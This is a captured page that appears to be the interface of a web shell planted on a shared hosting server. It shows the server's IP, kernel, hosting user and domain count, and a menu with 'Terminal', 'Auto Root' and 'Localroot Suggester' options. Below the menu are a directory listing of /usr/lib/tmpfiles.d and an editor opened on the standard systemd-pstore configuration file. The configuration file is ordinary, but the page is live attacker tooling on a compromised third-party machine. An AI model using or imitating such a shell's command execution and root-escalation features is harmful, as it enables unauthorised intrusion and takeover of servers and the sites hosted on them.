Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
tmpfiles.d /
Delete
Unzip
Name
Size
Permission
Date
Action
README
400
B
-rw-r--r--
2022-10-31 18:59
audit.conf
36
B
-rw-r-----
2025-09-21 11:48
clamd.scan.conf
43
B
-rw-r--r--
2025-12-04 23:04
cryptsetup.conf
35
B
-rw-r--r--
2025-09-21 12:02
dnf.conf
188
B
-rw-r--r--
2022-09-09 11:21
etc.conf
516
B
-rw-r--r--
2026-04-07 19:12
home.conf
362
B
-rw-r--r--
2022-10-31 18:59
journal-nocow.conf
1.07
KB
-rw-r--r--
2022-10-31 18:59
legacy.conf
907
B
-rw-r--r--
2026-04-07 19:12
libselinux.conf
30
B
-rw-r--r--
2025-03-12 23:36
man-db.conf
35
B
-rw-r--r--
2025-09-21 12:56
named.conf
32
B
-rw-r--r--
2026-04-15 05:39
pam.conf
166
B
-rw-r--r--
2025-09-03 03:47
pcp-conf.conf
570
B
-rw-r--r--
2025-09-22 09:42
provision.conf
851
B
-rw-r--r--
2026-04-07 19:09
rootfiles.conf
399
B
-rw-r--r--
2025-09-21 12:55
rsyslog.conf
38
B
-rw-r--r--
2025-09-21 13:08
samba.conf
28
B
-rw-r--r--
2026-03-17 06:03
selinux-policy.conf
137
B
-rw-r--r--
2026-03-02 09:32
setup.conf
60
B
-rw-r--r--
2024-04-03 18:29
static-nodes-permissions.conf
763
B
-rw-r--r--
2026-04-07 19:12
sudo.conf
305
B
-rw-r--r--
2025-09-21 14:35
systemd-nologin.conf
597
B
-rw-r--r--
2022-10-31 18:59
systemd-pstore.conf
1.48
KB
-rw-r--r--
2022-10-31 18:59
systemd-tmp.conf
823
B
-rw-r--r--
2022-10-31 18:59
systemd.conf
1.95
KB
-rw-r--r--
2026-04-07 19:12
tmp.conf
449
B
-rw-r--r--
2022-10-31 18:59
tpm2-tss-fapi.conf
432
B
-rw-r--r--
2024-10-02 21:42
var.conf
568
B
-rw-r--r--
2026-04-07 19:12
x11.conf
617
B
-rw-r--r--
2022-10-31 18:59
Save
Rename
# SPDX-License-Identifier: LGPL-2.1-or-later # # The systemd-pstore.service(1) archives the contents of /sys/fs/pstore # upon boot so that there is room for a subsequent dump. This service # is enabled with: # systemctl enable systemd-pstore # # With the service enabled, the kernel still needs to be configured # to write data into the pstore. The kernel has two parameters, # crash_kexec_post_notifiers and printk.always_kmsg_dump, that # control writes into pstore. # # The crash_kexec_post_notifiers parameter enables the kernel to write # dmesg (including stack trace) into pstore upon a panic even if kdump # is loaded, only needed if you want to use pstore with kdump. Without # this parameter, kdump could block writing to pstore for stability # reason. Note this increases the risk of kdump failure even if pstore # is not available. # # The printk.always_kmsg_dump parameter enables the kernel to write dmesg # upon a normal shutdown (shutdown, reboot, halt). # # To configure the kernel parameters, uncomment the appropriate # lines below. The value written is either 'Y' to enable the # kernel parameter, or 'N' to disable the kernel parameter. # # After making a change to this file, do: # systemd-tmpfiles --create path/to/tmpfiles.d/systemd-pstore.conf # # These changes are automatically applied on future re-boots. d /var/lib/systemd/pstore 0755 root root 14d #w- /sys/module/printk/parameters/always_kmsg_dump - - - - Y #w- /sys/module/kernel/parameters/crash_kexec_post_notifiers - - - - Y